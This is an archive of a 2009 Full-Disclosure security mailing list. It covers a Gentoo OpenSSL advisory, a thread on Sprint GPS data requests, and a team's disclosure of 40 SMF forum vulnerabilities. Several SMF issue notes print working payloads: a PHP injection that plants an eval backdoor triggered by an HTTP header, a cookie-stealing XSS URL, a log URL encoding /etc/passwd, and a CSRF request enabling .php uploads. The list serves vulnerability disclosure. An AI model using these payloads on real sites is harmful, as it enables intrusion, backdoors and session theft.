-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (Darwin) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iEYEARECAAYFAksVibwACgkQAr2PPaFwRuqDJgCfRCnrfQ5KhTcWH8jP5iAw+sJD bAEAoIDDpXX3IToJ1bjEvJrmsXtESgXc =pNlq -----END PGP SIGNATURE----- From a3li at gentoo.org Tue Dec 1 21:32:14 2009 From: a3li at gentoo.org (Alex Legler) Date: Tue, 1 Dec 2009 22:32:14 +0100 Subject: [Full-disclosure] [ GLSA 200912-01 ] OpenSSL: Multiple vulnerabilities Message-ID: <20091201223214.27fc47ed@mail.a3li.li> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200912-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: December 01, 2009 Bugs: #270305, #280591, #292022 ID: 200912-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in OpenSSL might allow remote attackers to conduct multiple attacks, including the injection of arbitrary data into encrypted byte streams. Background ========== OpenSSL is an Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) as well as a general purpose cryptography library. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-libs/openssl < 0.9.8l-r2 >= 0.9.8l-r2 Description =========== Multiple vulnerabilities have been reported in OpenSSL: * Marsh Ray of PhoneFactor and Martin Rex of SAP independently reported that the TLS protocol does not properly handle session renegotiation requests (CVE-2009-3555). * The MD2 hash algorithm is no longer considered to be cryptographically strong, as demonstrated by Dan Kaminsky. Certificates using this algorithm are no longer accepted (CVE-2009-2409). * Daniel Mentz and Robin Seggelmann reported the following vulnerabilities related to DTLS: A use-after-free flaw (CVE-2009-1379) and a NULL pointer dereference (CVE-2009-1387) in the dtls1_retrieve_buffered_fragment() function in src/d1_both.c, multiple memory leaks in the dtls1_process_out_of_seq_message() function in src/d1_both.c (CVE-2009-1378), and a processing error related to a large amount of DTLS records with a future epoch in the dtls1_buffer_record() function in ssl/d1_pkt.c (CVE-2009-1377). Impact ====== A remote unauthenticated attacker, acting as a Man in the Middle, could inject arbitrary plain text into a TLS session, possibly leading to the ability to send requests as if authenticated as the victim. A remote attacker could furthermore send specially crafted DTLS packages to a service using OpenSSL for DTLS support, possibly resulting in a Denial of Service. Also, a remote attacker might be able to create rouge certificates, facilitated by a MD2 collision. NOTE: The amount of computation needed for this attack is still very large. Workaround ========== There is no known workaround at this time. Resolution ========== All OpenSSL users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-0.9.8l-r2" References ========== [ 1 ] CVE-2009-1377 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1377 [ 2 ] CVE-2009-1378 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378 [ 3 ] CVE-2009-1379 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1379 [ 4 ] CVE-2009-1387 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1387 [ 5 ] CVE-2009-2409 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2409 [ 6 ] CVE-2009-3555 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3555 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200912-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 198 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091201/a21b5267/attachment.bin From ivanhec at gmail.com Wed Dec 2 00:30:02 2009 From: ivanhec at gmail.com (Ivan .) Date: Wed, 2 Dec 2009 11:30:02 +1100 Subject: [Full-disclosure] =?windows-1252?q?Feds_=91Pinged=92_Sprint_GPS_D?= =?windows-1252?q?ata_8_Million_Times_Over_a_Year?= Message-ID: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> http://www.wired.com/threatlevel/2009/12/gps-data/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091202/68d5eb17/attachment.html From erc at pobox.com Wed Dec 2 01:30:33 2009 From: erc at pobox.com (Ed Carp) Date: Tue, 1 Dec 2009 17:30:33 -0800 Subject: [Full-disclosure] =?windows-1252?q?Feds_=91Pinged=92_Sprint_GPS_D?= =?windows-1252?q?ata_8_Million_Times_Over_a_Year?= In-Reply-To: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> References: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> Message-ID: <1b0d006c0912011730i419db6cfia534e9ad5dd6a9d5@mail.gmail.com> If you read the article, that 8 million figure is the number of samplings, not the number of requests or the number of subscribers monitored. The article says that they can get data every 3 minutes over a 60 day period, which is 28,800 samples. Diving that into 8 million gives you 278 individual subscribers, which is probably much lower than the number of subscribers actually monitored. If you monitor a subscriber for 10 days (a typical number), you get 1667 subscribers monitored, a drop in the bucket of the 48 million subscribers that Sprint claims it has. Nothing to see here, I think ... move along, move along... ;) From matthias.appel at lanlabor.com Wed Dec 2 01:11:17 2009 From: matthias.appel at lanlabor.com (Matthias Appel) Date: Wed, 2 Dec 2009 02:11:17 +0100 Subject: [Full-disclosure] Feds 'Pinged' Sprint GPS Data 8 Million Times Over a Year In-Reply-To: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> References: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> Message-ID: <008101ca72ec$5cbc67e0$163537a0$@appel@lanlabor.com> As datda is gathered, there is someone who will request it..the only conclusion is not to gahter data! Von: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] Im Auftrag von Ivan . Gesendet: Mittwoch, 02. Dezember 2009 01:30 An: full-disclosure Betreff: [Full-disclosure] Feds 'Pinged' Sprint GPS Data 8 Million Times Over a Year http://www.wired.com/threatlevel/2009/12/gps-data/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091202/63ffa34d/attachment.html From thor at hammerofgod.com Wed Dec 2 01:59:29 2009 From: thor at hammerofgod.com (Thor (Hammer of God)) Date: Tue, 1 Dec 2009 17:59:29 -0800 Subject: [Full-disclosure] Feds 'Pinged' Sprint GPS Data 8 Million Times Over a Year In-Reply-To: <1b0d006c0912011730i419db6cfia534e9ad5dd6a9d5@mail.gmail.com> References: <6450e99d0912011630u1a628d97q8c653197da9fecc0@mail.gmail.com> <1b0d006c0912011730i419db6cfia534e9ad5dd6a9d5@mail.gmail.com> Message-ID: <09130A33C60C9C4982D35105CBABB278279EF7FF2E@Exchange.hammerofgod.com> Except that if you look at the report, you see that one request was made just 37 seconds after the first, yet only 6 were made in the hour. So who really knows? They can obviously request whatever they want when they want. Also, based on what the reported statement was, anyone with a logon can request location information for a sprint number - there was no mention of some back-end auditing process that ensures that only numbers with a valid search warrant are available; and I'm doubtful that is case since it is a nationally based system. This is what anonymous phones are for. t -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Ed Carp Sent: Tuesday, December 01, 2009 5:31 PM To: Ivan . Cc: full-disclosure Subject: Re: [Full-disclosure] Feds 'Pinged' Sprint GPS Data 8 Million Times Over a Year If you read the article, that 8 million figure is the number of samplings, not the number of requests or the number of subscribers monitored. The article says that they can get data every 3 minutes over a 60 day period, which is 28,800 samples. Diving that into 8 million gives you 278 individual subscribers, which is probably much lower than the number of subscribers actually monitored. If you monitor a subscriber for 10 days (a typical number), you get 1667 subscribers monitored, a drop in the bucket of the 48 million subscribers that Sprint claims it has. Nothing to see here, I think ... move along, move along... ;) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From smf2.review at gmail.com Wed Dec 2 03:34:06 2009 From: smf2.review at gmail.com (SMF 2.0 Code Review elhacker.net) Date: Wed, 2 Dec 2009 11:34:06 +0800 Subject: [Full-disclosure] 40 vulnerabilities in SMF 1.1.10/SMF 2.0RC2 by elhacker.net (Simple Audit) Message-ID: This is the first batch of vulnerabilities found by the SimpleAudit team from elhacker.net http://labs.elhacker.net/simpleaudit Our goal is to evaluate the security of SMF 2.0 before using it on our own server, and we have found several security vulnerabilities. The vulnerabilities that also apply to SMF 1.1.10 were fixed by the SMF team today, on SMF 1.1.11 visit simplemachines.org for details. You can review the list of the published vulnerabilities in: http://code.google.com/p/smf2-review/issues/list Vuln Summary + Labels Afecta Discovered ... CSRF, RCE PHP Remote Code Execution SMF2 www.kernel32 CSRF CSRF theme change SMF2, SMF1 www.kernel32 CSRF Subforum Category Collapse CSRF SMF2, SMF1 www.kernel32 CSRF CSRF en el gestor de servidores de paquetes SMF2, SMF1 www.kernel32 XSS XSS in package server manager SMF2, SMF1 www.kernel32 CSRF CSRF package deletion and installed package disclosure SMF2 www.kernel32 CSRF, XSS Attached files configuration CSRF SMF2 www.kernel32 XSS XSS in "Enable basic HTML in posts" SMF2 sirdarckcat RFD Remote File Disclosure (solo en logs, y similares) SMF2 sirdarckcat CSRF CSRF en Moderation Preferences SMF2 sirdarckcat XSS XSS en el censurador de palabras SMF2, SMF1 sirdarckcat CSRF CSRF in Polls SMF2, SMF1 sirdarckcat XSS installer XSS SMF2 brlvldvlsmrtnz XSS XSS in the installer (install.php) SMF2 cicatriz.r00t CSRF CSRF in the message rule manager SMF2 cicatriz.r00t XSS XSS in smileys manager SMF2 cicatriz.r00t XSS Error log XSS SMF2 www.kernel32 CSRF Arbitrary package deinstalation CSRF SMF2 www.kernel32 XSS User search XSS SMF2 www.kernel32 XSS language manager CSRF+XSS SMF2 cicatriz.r00t XSS XSS in forum name SMF2 ysk.sft XSS XSS in logo. SMF2 cicatriz.r00t CSRF, XSS CSRF in the posts settings SMF2 brlvldvlsmrtnz XSS Language search XSS SMF2 brlvldvlsmrtnz XSS XSS in theme name of themes and layout settings. SMF2 brlvldvlsmrtnz XSS XSS in member options with theme name SMF2 brlvldvlsmrtnz XSS XSS in theme url and settings SMF2 brlvldvlsmrtnz XSS XSS in modify themes with theme names SMF2 brlvldvlsmrtnz XSS, CSRF XSS in package manager / options SMF2 cicatriz.r00t CSRF CSRF permite darle permisos a los usuarios normales para modificar permisos del foro SMF2 ysk.sft CSRF CSRF join 2 topics . SMF2 ysk.sft CSRF CSRF permite borrar una encuesta SMF2 ysk.sft CSRF CSRF permite elevar privilegios de usuarios normales para modificar los smileys SMF2 ysk.sft DoS RSS DoS SMF2, SMF1 www.kernel32 CSRF Session token stealling SMF2, SMF1 www.kernel32 ---- ReDoS en htmltrim SMF2 sirdarckcat DoS Forum access DoS SMF2 sirdarckcat XSS XSS en la subida de archivos. SMF2 ysk.sft CSRF Message rule CSRF SMF2 brlvldvlsmrtnz CSRF Steal session token SMF2, SMF1 www.kernel32 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091202/05653b35/attachment-0001.html From tomb at byrneit.net Wed Dec 2 05:59:56 2009 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Tue, 1 Dec 2009 21:59:56 -0800 Subject: [Full-disclosure] Software developer looks at CRU code In-Reply-To: References: Message-ID: <70D072392E56884193E3D2DE09C097A9382043@pascal.zaphodb.org> In the interests of Full Disclosure, read the code yourselves: http://di2.nu/foia/HARRY_READ_ME-0.html -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of RandallM Sent: Tuesday, December 01, 2009 5:21 AM To: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Software developer looks at CRU code > > ------------------------------ > > Message: 7 > Date: Mon, 30 Nov 2009 17:58:07 -0600 > From: Paul Schmehl > Subject: Re: [Full-disclosure] Software developer looks at CRU code > To: Valdis.Kletnieks at vt.edu, full-disclosure at lists.grok.org.uk > Message-ID: <9FDEE72348C6AE04EDD44AF2 at utd65257.utdallas.edu> > Content-Type: text/plain; charset=us-ascii; format=flowed > > No, Valdis. ?There *is* no saving us. Not true. according to the UN if we 'just" reduce human population or prevent more population that will help, right? http://www.cnsnews.com/news/article/57328 -- been great, thanks a.k.a System _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From smf2-review at googlecode.com Wed Dec 2 03:13:48 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:13:48 +0000 Subject: [Full-disclosure] Issue 6 in smf2-review: PHP Remote Code Execution In-Reply-To: <7-2538859318637037321-2985837215097433744-smf2-review=googlecode.com@googlecode.com> References: <7-2538859318637037321-2985837215097433744-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-2985837215097433744-smf2-review=googlecode.com@googlecode.com> Message-ID: <8-2538859318637037321-2985837215097433744-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #8 on issue 6 by sirdarckcat: PHP Remote Code Execution http://code.google.com/p/smf2-review/issues/detail?id=6 Description: PHP Remote Code Execution Discovered by: WHK at elhacker.net Vulnerable code: Sources/ManageServer.php:1409 Vulnerable URL: Themes/default/languages/index.english.php PoC: en_US\\\'; $x=$_SERVER[HTTP_EXEC];if($x){@eval($x);exit;} // -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:21:49 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:21:49 +0000 Subject: [Full-disclosure] Issue 9 in smf2-review: Subforum Category Collapse CSRF In-Reply-To: <3-2538859318637037321-13472282126429846394-smf2-review=googlecode.com@googlecode.com> References: <3-2538859318637037321-13472282126429846394-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-13472282126429846394-smf2-review=googlecode.com@googlecode.com> Message-ID: <4-2538859318637037321-13472282126429846394-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #4 on issue 9 by sirdarckcat: Subforum Category Collapse CSRF http://code.google.com/p/smf2-review/issues/detail?id=9 Description: Subforum Category Collapse CSRF Discovered by: WHK at elhacker.net Vulnerable code: Sources/BoardIndex.php:130 Vulnerable URL: index.php?action=collapse;c=1;sa=collapse PoC: N/A -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:25:50 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:25:50 +0000 Subject: [Full-disclosure] Issue 10 in smf2-review: CSRF en el gestor de servidores de paquetes In-Reply-To: <7-2538859318637037321-1707860385541435559-smf2-review=googlecode.com@googlecode.com> References: <7-2538859318637037321-1707860385541435559-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-1707860385541435559-smf2-review=googlecode.com@googlecode.com> Message-ID: <8-2538859318637037321-1707860385541435559-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #8 on issue 10 by sirdarckcat: CSRF en el gestor de servidores de paquetes http://code.google.com/p/smf2-review/issues/detail?id=10 Description: CSRF in package server manager Discovered by: WHK at elhacker.net Vulnerable code: Sources/Packages.php#1189 Vulnerable URL: http://127.0.0.1/smf_2/index.php?action=admin;area=packages;get;sa=remove;server=1 PoC: N/A -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:09:46 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:09:46 +0000 Subject: [Full-disclosure] Issue 5 in smf2-review: XSS in 'website' field in User Profile In-Reply-To: <5-2538859318637037321-15479885324352404386-smf2-review=googlecode.com@googlecode.com> References: <5-2538859318637037321-15479885324352404386-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-15479885324352404386-smf2-review=googlecode.com@googlecode.com> Message-ID: <6-2538859318637037321-15479885324352404386-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #6 on issue 5 by sirdarckcat: XSS in 'website' field in User Profile http://code.google.com/p/smf2-review/issues/detail?id=5 Description: XSS in 'website' field in User Profile Discovered by: WHK at elhacker.net Vulnerable code: Sources/Profile-Modify.php:802 Vulnerable URL: N/A PoC: javascript:alert(document.cookie);//http://xx -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:17:48 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:17:48 +0000 Subject: [Full-disclosure] Issue 8 in smf2-review: CSRF theme change In-Reply-To: <4-2538859318637037321-12769700146814006733-smf2-review=googlecode.com@googlecode.com> References: <4-2538859318637037321-12769700146814006733-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-12769700146814006733-smf2-review=googlecode.com@googlecode.com> Message-ID: <5-2538859318637037321-12769700146814006733-smf2-review=googlecode.com@googlecode.com> Updates: Status: Parcheada Labels: -Notificar-SMF Notificar-FD Comment #5 on issue 8 by sirdarckcat: CSRF theme change http://code.google.com/p/smf2-review/issues/detail?id=8 Description:CSRF theme change Discovered by: WHK at elhacker.net Vulnerable code: Sources/Load.php#1245 Vulnerable URL: index.php?theme=2 PoC: N/A -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:29:51 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:29:51 +0000 Subject: [Full-disclosure] Issue 11 in smf2-review: XSS in package server manager In-Reply-To: <7-2538859318637037321-14641730326434297600-smf2-review=googlecode.com@googlecode.com> References: <7-2538859318637037321-14641730326434297600-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-14641730326434297600-smf2-review=googlecode.com@googlecode.com> Message-ID: <8-2538859318637037321-14641730326434297600-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #8 on issue 11 by sirdarckcat: XSS in package server manager http://code.google.com/p/smf2-review/issues/detail?id=11 Description: XSS in package server manager Discovered by: WHK at elhacker.net Vulnerable code: Sources/PackageGet.php#732 Vulnerable URL: index.php?action=packageget PoC: "Add server" => Name:

XSS

-- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:33:53 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:33:53 +0000 Subject: [Full-disclosure] Issue 12 in smf2-review: CSRF package deletion and installed package disclosure In-Reply-To: <5-2538859318637037321-15105464747186452891-smf2-review=googlecode.com@googlecode.com> References: <5-2538859318637037321-15105464747186452891-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-15105464747186452891-smf2-review=googlecode.com@googlecode.com> Message-ID: <6-2538859318637037321-15105464747186452891-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #6 on issue 12 by sirdarckcat: CSRF package deletion and installed package disclosure http://code.google.com/p/smf2-review/issues/detail?id=12 Description: CSRF package deletion and installed package disclosure Discovered by: WHK at elhacker.net Vulnerable code: Sources/Packages.php#1189 Vulnerable URL: /index.php?action=admin;area=packages;sa=remove;package=.htaccess PoC: N/A -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:37:54 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:37:54 +0000 Subject: [Full-disclosure] Issue 13 in smf2-review: Attached files configuration CSRF In-Reply-To: <5-2538859318637037321-12333965083115595060-smf2-review=googlecode.com@googlecode.com> References: <5-2538859318637037321-12333965083115595060-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-12333965083115595060-smf2-review=googlecode.com@googlecode.com> Message-ID: <6-2538859318637037321-12333965083115595060-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #6 on issue 13 by sirdarckcat: Attached files configuration CSRF http://code.google.com/p/smf2-review/issues/detail?id=13 Description: Attached files configuration CSRF Discovered by: WHK at elhacker.net Vulnerable code: Sources/ManageAttachments.php#117 Sources/ManageAttachments.php#162 Vulnerable URL: /index.php?action=admin;area=manageattachments;sa=attachments PoC: POST: attachmentEnable=1&attachmentExtensions=com%2Cexe%2Cphp5%2Cphp4%2Cconf%2Ccfg%2Cini%2Chtaccess%2Cphp&attachmentUploadDir=%2Fopt%2Flampp%2Fhtdocs%2Fsmf_2%2Fattachments&attachmentDirSizeLimit=10240&attachmentPostLimit=192&attachmentSizeLimit=128&attachmentNumPerPostLimit=4&attachmentShowImages=1&attachmentThumbnails=1&attachmentThumbWidth=150&attachmentThumbHeight=150 -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:41:56 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:41:56 +0000 Subject: [Full-disclosure] Issue 14 in smf2-review: XSS in "Enable basic HTML in posts" In-Reply-To: <2-2538859318637037321-14667145804478803796-smf2-review=googlecode.com@googlecode.com> References: <2-2538859318637037321-14667145804478803796-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-14667145804478803796-smf2-review=googlecode.com@googlecode.com> Message-ID: <3-2538859318637037321-14667145804478803796-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #3 on issue 14 by sirdarckcat: XSS in "Enable basic HTML in posts" http://code.google.com/p/smf2-review/issues/detail?id=14 Description: XSS in "Enable basic HTML in posts" Discovered by: sirdarckcat at elhacker.net Vulnerable code: N/A Vulnerable URL: N/A PoC: -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:45:57 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:45:57 +0000 Subject: [Full-disclosure] Issue 15 in smf2-review: Remote File Disclosure (solo en logs, y similares) In-Reply-To: <3-2538859318637037321-17936407780710981462-smf2-review=googlecode.com@googlecode.com> References: <3-2538859318637037321-17936407780710981462-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-17936407780710981462-smf2-review=googlecode.com@googlecode.com> Message-ID: <4-2538859318637037321-17936407780710981462-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #4 on issue 15 by sirdarckcat: Remote File Disclosure (solo en logs, y similares) http://code.google.com/p/smf2-review/issues/detail?id=15 Description: Remote File Disclosure logs Discovered by: sirdarckcat at elhacker.net Vulnerable code: N/A Vulnerable URL: index.php?action=admin;area=logs;sa=errorlog;file=L2V0Yy9wYXNzd2Q== PoC: An attacker forcing that page to render as CSS can enable him to read it's content. -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:49:58 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:49:58 +0000 Subject: [Full-disclosure] Issue 16 in smf2-review: CSRF en Moderation Preferences In-Reply-To: <3-2538859318637037321-7931085222621129589-smf2-review=googlecode.com@googlecode.com> References: <3-2538859318637037321-7931085222621129589-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-7931085222621129589-smf2-review=googlecode.com@googlecode.com> Message-ID: <4-2538859318637037321-7931085222621129589-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #4 on issue 16 by sirdarckcat: CSRF en Moderation Preferences http://code.google.com/p/smf2-review/issues/detail?id=16 Description: CSRF in Moderation Preferences Discovered by: sirdarckcat at elhacker.net Vulnerable code: N/A Vulnerable URL: index.php?action=moderate;area=settings PoC: this is not protected against csrf -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:58:06 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:58:06 +0000 Subject: [Full-disclosure] Issue 18 in smf2-review: CSRF in Polls In-Reply-To: <3-2538859318637037321-15108067541650338590-smf2-review=googlecode.com@googlecode.com> References: <3-2538859318637037321-15108067541650338590-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-15108067541650338590-smf2-review=googlecode.com@googlecode.com> Message-ID: <4-2538859318637037321-15108067541650338590-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #4 on issue 18 by sirdarckcat: CSRF in Polls http://code.google.com/p/smf2-review/issues/detail?id=18 (No comment was entered for this change.) -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 04:02:07 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 04:02:07 +0000 Subject: [Full-disclosure] Issue 19 in smf2-review: installer XSS In-Reply-To: <4-2538859318637037321-13772654216459620468-smf2-review=googlecode.com@googlecode.com> References: <4-2538859318637037321-13772654216459620468-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-13772654216459620468-smf2-review=googlecode.com@googlecode.com> Message-ID: <5-2538859318637037321-13772654216459620468-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #5 on issue 19 by sirdarckcat: installer XSS http://code.google.com/p/smf2-review/issues/detail?id=19 (No comment was entered for this change.) -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From smf2-review at googlecode.com Wed Dec 2 03:54:05 2009 From: smf2-review at googlecode.com (smf2-review at googlecode.com) Date: Wed, 02 Dec 2009 03:54:05 +0000 Subject: [Full-disclosure] Issue 17 in smf2-review: XSS en el censurador de palabras In-Reply-To: <2-2538859318637037321-13312009556717141538-smf2-review=googlecode.com@googlecode.com> References: <2-2538859318637037321-13312009556717141538-smf2-review=googlecode.com@googlecode.com> <0-2538859318637037321-13312009556717141538-smf2-review=googlecode.com@googlecode.com> Message-ID: <3-2538859318637037321-13312009556717141538-smf2-review=googlecode.com@googlecode.com> Updates: Status: Arreglada Labels: -Notificar-SMF Notificar-FD Comment #3 on issue 17 by sirdarckcat: XSS en el censurador de palabras http://code.google.com/p/smf2-review/issues/detail?id=17 (No comment was entered for this change.) -- You received this message because you are listed in the owner or CC fields of this issue, or because you starred this issue. You may adjust your issue notification preferences at: http://code.google.com/hosting/settings From nicolas.ruff at gmail.com Wed Dec 2 10:46:05 2009 From: nicolas.ruff at gmail.com (Nicolas RUFF) Date: Wed, 02 Dec 2009 11:46:05 +0100 Subject: [Full-disclosure] ** FreeBSD local r00t zeroday In-Reply-To: <2051E951-783D-4BC8-855B-D1CFD0969308@gmail.com> References: <8a1ab0ce0912011033p4bb98612v625118f2cdd4fd75@mail.gmail.com> <2051E951-783D-4BC8-855B-D1CFD0969308@gmail.com> Message-ID: <4B16456D.8090404@gmail.com> > Is that the Debian userland/FreeBSD kernel thingy? I fear it is .... "Linux freebsd2 2.4.2 FreeBSD 7.1-RELEASE #0: Thu Jan 1 14:37:25 UTC 2009 i686 i686 i386 GNU/Linux" I guess "apt-get install local-r00t" should work on that system :) Regards, - Nicolas RUFF From a.purificato at uni.it Wed Dec 2 10:21:30 2009 From: a.purificato at uni.it (Andrea Purificato) Date: Wed, 02 Dec 2009 12:21:30 +0200 Subject: [Full-disclosure] [rejected] Oracle exploit for CTXSYS.DRVXTABC.CREATE_TABLES and others In-Reply-To: <4B117BBF.9060209@uni.it> References: <4B117BBF.9060209@uni.it> Message-ID: I wrote: >CTXSYS.DRVXTABC.CREATE_TABLES injection on Oracle DB 9i/10g (CVE-2009-1991) Hi all, I really apologize for the mistake. The released code about this flaw seems not working because of the "authid current_user" clause used during the creation of the DRVXTABC package. There were some contributory causes that drive me into the 